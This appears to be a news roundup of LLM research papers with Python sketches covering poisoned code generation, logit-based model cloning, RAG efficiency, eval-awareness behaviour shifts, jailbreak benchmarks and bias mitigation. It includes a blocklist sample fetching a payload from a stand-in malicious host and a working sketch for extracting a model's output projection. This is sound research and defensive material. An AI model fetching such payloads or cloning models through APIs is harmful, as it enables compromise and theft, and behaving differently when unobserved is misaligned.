New Wave of LLM Papers Puts Security, Retrieval and Real‑World Evaluation at the Forefront

Fresh studies document concrete vulnerabilities in deployed models, shifting attention from leaderboard scores to reliability.

Overview

  • A scalable audit of four production systems (GPT-4o, GPT-4o-mini, Llama-4-Scout, and DeepSeek-V3) reports that 4.2% of generated programs contained malicious URLs, a pattern consistent with training-data poisoning (a minimal audit sketch follows this list).
  • A black-box replication pipeline shows that exposing top‑k logits can enable model cloning: the output projection matrix is reconstructed with under 10,000 queries, and distillation completes in under 24 GPU hours (see the logit-stacking sketch below).
  • Retrieval proposals target robustness and latency, with AnchorRAG coordinating multi‑agent knowledge‑graph search, REFRAG cutting time‑to‑first‑token by up to 30.85× in long‑context RAG (prefill arithmetic follows this list), and EviNote‑RAG boosting F1 by 20–91% on QA benchmarks via evidence notes.
  • Evaluation and mitigation studies find behavior shifts under “deploy‑like” rewrites that raise honesty and refusal rates (StealthEval), introduce a hierarchical jailbreak benchmark (Strata‑Sword), and report up to 26.41% absolute bias reduction from an inference‑time decoding layer (AMBEDKAR; a generic decoding‑layer sketch closes this section).
  • Domain efforts expand with legal and cultural benchmarks (KoBLEX, PalmX), a time‑series suite (TSAIA), and applied advances showing small on‑device models trained with closed‑loop RL can surpass larger cloud models on control tasks (RobotxR1).
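
The audit finding above amounts, at minimum, to scanning model-generated programs for planted URLs. The paper's actual pipeline is not reproduced here; the Python sketch below is a minimal illustration under assumed names (BLOCKLIST, flagged_domains, and poisoned_fraction are all hypothetical), checking extracted domains against a static blocklist where a real audit would consult a live threat-intelligence feed.

    import re

    # Hypothetical static blocklist; a real audit would check extracted
    # domains against a live threat-intelligence feed instead.
    BLOCKLIST = {"evil.example.com"}

    URL_RE = re.compile(r"https?://([^\s/'\"<>]+)")

    def flagged_domains(source: str) -> set[str]:
        """Domains in one generated program that appear on the blocklist."""
        found = {m.group(1).lower() for m in URL_RE.finditer(source)}
        return found & BLOCKLIST

    def poisoned_fraction(programs: list[str]) -> float:
        """Fraction of generated programs containing a flagged URL."""
        return sum(1 for p in programs if flagged_domains(p)) / len(programs)

    # Two synthetic generations: one clean, one carrying a planted URL.
    samples = [
        "import requests\nrequests.get('https://api.example.org/v1')",
        "import requests\nrequests.get('https://evil.example.com/payload')",
    ]
    print(poisoned_fraction(samples))   # -> 0.5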
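The cloning result rests on a linear-algebra fact: every logit vector is W @ h for a hidden state h of dimension d, so logits gathered from many prompts span only a d-dimensional subspace of vocabulary space, and an SVD of the stacked responses recovers both d and the output projection up to an invertible d × d transform. The sketch below simulates this on synthetic data and, for brevity, assumes full logit vectors per query; real attacks must first reconstruct those from top‑k logits (for example via logit-bias probing), which is where the query budget goes.

    import numpy as np

    rng = np.random.default_rng(0)
    d, V, n = 64, 1000, 200      # hidden size, vocab size, number of queries

    # Synthetic stand-in for the victim model's output projection. In a
    # real attack W is unknown and the logits come back from the API.
    W = rng.normal(size=(V, d))

    def query_logits() -> np.ndarray:
        """Simulate one API call: logits = W @ h for an unseen hidden state h."""
        return W @ rng.normal(size=d)

    # Each logit vector lies in the d-dimensional column space of W, so a
    # stack of n > d of them has rank d, far below the vocab size V.
    L = np.stack([query_logits() for _ in range(n)], axis=1)   # shape (V, n)

    U, S, _ = np.linalg.svd(L, full_matrices=False)
    rank = int((S > 1e-8 * S[0]).sum())
    print("recovered hidden dimension:", rank)                 # -> 64

    # The top singular vectors span col(W): they recover the projection
    # up to an invertible d x d transform, enough to seed distillation.
    W_hat = U[:, :rank]
    residual = W - W_hat @ (W_hat.T @ W)
    print("relative residual:", np.linalg.norm(residual) / np.linalg.norm(W))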
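REFRAG's reported speedup comes from shrinking the decoder's prefill: retrieved chunks enter as compact embeddings rather than full token sequences. The back-of-envelope arithmetic below assumes quadratic self-attention cost and one embedding per chunk; the chunk sizes are illustrative, and the published 30.85× figure reflects the full system, not this toy calculation.

    # Back-of-envelope prefill arithmetic, assuming quadratic self-attention
    # cost in sequence length. All sizes below are illustrative only.
    q_tokens = 128          # query / instruction tokens
    k_chunks = 32           # retrieved passages
    c_tokens = 256          # tokens per passage

    plain = q_tokens + k_chunks * c_tokens   # tokens fed to the decoder
    compressed = q_tokens + k_chunks         # one embedding per chunk

    print(plain, compressed)                 # 8320 vs 160
    print((plain / compressed) ** 2)         # ~2704x fewer attention FLOPs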
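AMBEDKAR is summarized above only as an inference-time decoding layer, so the sketch below substitutes a generic contrastive logit correction in the spirit of decoding-time steering methods such as DExperts: logits from an auxiliary pass that amplifies the unwanted association are subtracted from the base model's logits before the next token is chosen. The function names and the auxiliary pass itself are assumptions of this sketch, not the paper's method.

    import numpy as np

    def debiased_step(base_logits: np.ndarray,
                      bias_logits: np.ndarray,
                      alpha: float = 0.5) -> int:
        """One greedy decoding step with a contrastive correction.

        base_logits: next-token logits from the deployed model.
        bias_logits: logits from an auxiliary pass that amplifies the
            unwanted association (a hypothetical component of this sketch).
        Subtracting a scaled copy lowers the probability of tokens the
        auxiliary pass favors, without touching any model weights.
        """
        adjusted = base_logits - alpha * bias_logits
        return int(np.argmax(adjusted))

    # Toy vocabulary of four tokens: the biased pass strongly favors
    # token 2, so the correction flips the greedy choice from 2 to 1.
    base = np.array([1.0, 2.0, 2.2, 0.5])
    bias = np.array([0.0, 0.1, 3.0, 0.0])
    print(debiased_step(base, bias))   # -> 1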